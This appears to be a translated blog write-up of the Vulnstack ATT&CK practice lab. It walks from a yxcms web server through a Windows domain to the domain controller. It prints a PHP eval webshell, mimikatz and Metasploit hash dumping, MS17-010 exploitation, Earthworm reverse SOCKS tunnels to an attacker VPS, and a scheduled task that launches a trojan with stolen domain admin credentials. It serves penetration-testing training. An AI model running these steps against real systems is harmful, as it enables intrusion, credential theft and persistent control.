A Basic Vulnstack Penetration Experience

Shooting range introduction:

The actual combat series mainly uses real corporate environments as examples to build a series of shooting ranges, and learn through the trinity of exercises, video tutorials, and blogs. In addition, this actual combat completely simulates the ATT&CK attack link to build, opening into a complete closed loop. Follow-up will also build a real APT actual combat environment to grow from actual combat. Regarding the environment, various actual combat routes can be simulated. At present, the author’s actual combat route is given as follows. All virtual machines have a unified password: hongrisec@2019:

1. Environment construction
1. Environment build test
2. Information collection

2. Vulnerability Exploitation
3. Vulnerability search and exploitation
4. Background Getshell upload skills
5. System information collection
6. Host password collection

3. Intranet collection
7. Intranet-continue information collection
8. Intranet attack posture-information leakage
9. Intranet attack posture-MS08-067
10. Intranet attack posture-SMB remote desktop password guessing
11. Intranet attack posture-Oracle database TNS service vulnerability
12. Intranet attack posture-RPC DCOM service vulnerability

Fourth, lateral movement
13. Other host ports in the intranet-file reading
14. Other host ports in the intranet-redis
15. Other host ports in the intranet-redis Getshell
16. Other host ports in the intranet-MySQL database
17. Other host ports in the intranet-MySQL privilege escalation

Five, build a channel
18. Other host ports in the intranet-proxy forwarding

Six, lasting control
19. Domain penetration-domain member information collection
20. Domain penetration-weak password detection and deep use of powershell for basic services
21. Domain penetration-lateral movement [wmi utilization]
22. Domain penetration-C2 command execution
23. Domain penetration-use DomainFronting to realize deep hiding of beacon
24. Domain penetration-realization and utilization of domain control

Seven, trace cleanup
25, log cleanup

ATT&CK Evaluation Actual Combat Range
File size: 13 GB
File MD5: e16fd0f6a5104aef0dfa73460afff0e8
File SHA1: 078ce02d01298fe40a1feb8260fde79d5fb06bc6

Downloadlink: https://pan.baidu.com/s/1OXB9xW0dv8Rkgz6O7krSUA

password: svwa



1. Vulnerability search and utilization 2. Background Getshell upload skills 3. System information collection 4. Host password collection

Intranet collection

1. Intranet-continue information collection 2. Intranet attack posture-information leakage 3. Intranet attack posture-MS08-067 4. Intranet attack posture-SMB remote desktop password guessing 5. Intranet attack posture-Oracle database TNS service vulnerability 6. Intranet attack posture-RPC DCOM service vulnerability

Lateral movement

1. Intranet other host ports-file reading 2. Intranet other host ports-redis 3. Intranet other host ports-redis Getshell 4. Intranet other host ports-MySQL database 5. Intranet other host ports-MySQL mention right

Build channel

Intranet other host port-proxy forwarding

Permanent control

1. Domain penetration-domain member information collection 2. Domain penetration-basic service weak password detection and deep utilization of powershell 3. Domain penetration-lateral movement [wmi utilization] 4. Domain penetration-C2 command execution 5. Domain penetration-use of DomainFronting Realize the deep hiding of beacon 6. Domain penetration-domain control realization and utilization

Trace cleanup

The following is the topology of the entire range:

Web server:

Windows7 (with phpstudy web environment)

Analog external network ip:

Intranet ip:

Hosts in the domain:

Win2K3 Metasploitable

Intranet ip:

Domain control:

Windows 2008

Intranet ip:

The above intranet cannot communicate with the external network, only win7 can connect to the internal and external networks.

Let’s start the actual combat! ! !

Preliminary Study on the Extranet
The simulated external network ip to access the web server win7-

It is a web site, and the back-end address-/index.php?r=admin is leaked in the “Announcement Information” on the right, we log in to the back-end, check the default back-end password of yxcms and log in:

Successful landing

Found that the php file can be directly edited in the front-end template function, we can directly write to the webshell and connect

We write in acomment.php

After saving, we will find a way to find the directory where this acomment.php is located, let’s scan the background

Found many directories, here we found that this cms has a directory traversal vulnerability:

At this time, as long as you browse to find the page you just modified, you can use the shell connector to connect.

Another method here is that we found that there is phpmyadmin on the web server, then we can log in. This is the target machine, which is naturally a weak password (root/root):

The common methods of phpmyadmin background getshell are the following methods:

1. Select into outfile to write directly

2. Open the global log getshell

3. Use slow query log getsehll

4. Use error log getshell

5. Use phpmyadmin4.8.x local file to contain vulnerability getshell

Execute the following sql statement

 show variables like '%secure%';

It is found that there is no write permission and cannot be written into the shell using the select into outfile method. Let’s take a look at the second method, use the global variable general_log to get shell

We turn on the global log and set the directory where the log is saved to the web directory

set global general_log=on;# Open log
 set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';# Set the log location to the website directory

Set successfully

At this time, execute the following statement to write webshell to hack.php

select '<?php eval($_POST[whoami]); ?>'

then connect it


Break into the intranet
We found that the shell we just got was an administrator’s shell

That’s great. The next thing we need to do is collect information to prepare for the intranet.

Preliminary collection

ipconfig /all View the local ip and domain
Route print Print routing information
Net view View other host names in the LAN
Arp -a View the arp cache
Net start Check which services are enabled
Net share Check which sharing is enabled
Net share ipc$ Open ipc sharing
Net share c$ Open c drive sharing
Net use \\192.168.xx.xx\ipc$ "" /user:"" Establish an empty connection with 192.168.xx.xx
Net use \\192.168.xx.xx\c$ "password" /user:"user name" Create c drive sharing
Dir \\192.168.xx.xx\c$\user View the files in the user directory of disk 192.168.xx.xx
Net config Workstation View computer name, full name, user name, system version, workstation, domain, login domain
Net user View the list of local users
Net user /domain View domain users
Net localgroup administrators View the local administrator group (usually there are domain users)
Net view /domain View how many domains
Net user username /domain Get the information of the specified domain user
Net group /domain View the workgroups in the domain, and check how many groups the users are divided into (only operate on the domain controller)
Net group group name /domain View a working group in the domain
Net group "domain admins" /domain View the names of domain administrators
Net group "domain computers" /domain View other host names in the domain
Net group "doamin controllers" /domain View domain controllers (there may be more than one)

Routing information:

Collected the following key information:

The domain name is god.org, the domain controller is OWA$, the domain administrator is Administrator, and the internal network segment is We use the Ping command to detect the domain controller’s ip

ping owa.god.org

It can be seen that the domain controller ip is

Next, we create a whoami user on the win7 local host and add it to the administrator group

Then try to log in remotely to see if 3389 is turned on:

netstat -ano | find "3389"

Found it was on.

If it is not turned on, use the following command to turn it on

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

I tried to log in to the remote desktop connection with the whoami user but failed. Nmap scanned port 3389 and found that the status was filtered, which seems to be filtered by the firewall. At this time, we can bounce a msf shell back, and then use enable_rdp to try to close the firewall.

Here, for the authenticity of the experimental environment, I regard my attacker kali as a host in another LAN, and use frp to map msf to the external network vps to achieve control of “remote” windows7:

Generate and upload Trojan

Execute the Trojan horse and listen on kali

Go online successfully.

Because it is an administrator user, it is easy to escalate rights.

Execute run post/windows/manage/enable_rdp module to turn off the firewall, and use rdesktop to open the remote desktop

Successfully opened the remote desktop. Next, we further collect information.

Grab the hash

Failed, we use msf’s own module for hash fetching

meterpreter > run post/windows/gather/smart_hashdump

We upload and use mimitakz (need to avoid killing in actual combat) for crawling

Elevate permissions first


Then use


At this point we have obtained the plaintext password of the administrator (domain administrator)-Liu78963

Next, we further penetrate into the intranet and infiltrate other hosts in the domain.

Go further (lateral movement)
We use the following methods to detect surviving hosts on the intranet:

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="   Use Ping command to detect internal network hosts

An intranet host was detected with ip Let’s add a route to infiltrate the host.

Detect whether ms17_010 exists:

A loophole was found and then attack.


The attack failed. With the built-in 17-010 of msf, failure is a common thing. Sometimes msf fails to receive the session after running 2003 for many times, and when ms17-010 is used, server 2003 is easily blue screen. You can try the msf 17-010 script (ms17_010_eternalblue_doublepulsar) for the full version of windows 2003-windows 10 on github. We can try to open the remote desktop of the host directly. Since the host is in the internal network, our attacking machine is relatively in the external network and cannot directly communicate with the host in the internal network, so we need to use Earthworm as a Socks5 proxy to enter the internal network. Net to get more hosts.

Open Earthworm monitoring on our public network vps

 ./ew_for_linux64 -s rcsocks -l 1080 -e 1234

This command means to add a transfer tunnel, monitor 1234, and forward the proxy request received on the local port 1024 to port 1080, where port 1024 is only used to transmit traffic.

Upload ew_for_Win.exe to the victim host of win7, and start the socks5 server on win7 and bounce to vps

ew_for_Win.exe -s rssocks -d 39.1xx.xx9.xx0 -e 1234

Then configure proxychains:

In this way, the intranet host win2003 can communicate with the attacking machine kali through vps. Here we need to know that we set up routing on the msf to allow msf to communicate to other hosts on the intranet; and we set up the proxy to allow other tools on the attacking machine Can communicate to other hosts on the intranet.

Use nmap to scan port 3389 of win2003 and find that it is not enabled:

proxychains4 nmap -p 3389 -Pn -sT   # -Pn and -sT must have

We use the auxiliary/admin/smb/ms17_010_command module to execute the command to turn it on:

Scan again to open

Open remote desktop

Here, I used to add a user first, and then use exploit/windows/smb/ms17_010_psexec to try to call a shell back, because this module requires you to specify an administrator user.

First use auxiliary/admin/smb/ms17_010_command to add a user

And add this user to the administrator group:

Check to see that the addition was successful:

Then use exploit/windows/smb/ms17_010_psexec to try to call a shell back, and finally succeeded after several attempts:

And is the highest authority.

First check which patches are not applied..

 run post/windows/gather/enum_patches

There are too few patches…

After got win2003, the next step is to enter the domain control

Enter domain control
The first thing I thought of was ms17_010, but it also failed, because we had obtained the password of the domain administrator administrator-Liu78963 in the previous information collection, so I tried to log in remotely.

Failure, also because 3389 is not turned on

Tried to open but failed

There is only another way of thinking, here we upload a msf Trojan on the domain control through win7.

First use win7 to connect to the c drive sharing of the domain controller

net use \\\c$ "Liu78963" /user:"administrator"

Use dir to view the resources of the domain controller.

Upload the shell.exe on the win7 host to the domain controller

 copy c:\phpstudy\www\yxcms\shell.exe \\\c$

Set up a task plan and start the Trojan regularly to get the domain control shell

shell schtasks /create /tn "test" /tr C:\shell.exe /sc once /st 18:05 /S /RU System  /u administrator /p "Liu78963"

This shooting range can be considered a very basic shooting range, very suitable for novice practice。



There are no reviews yet.

Be the first to review “A Basic Vulnstack Penetration Experience”

Your email address will not be published. Required fields are marked *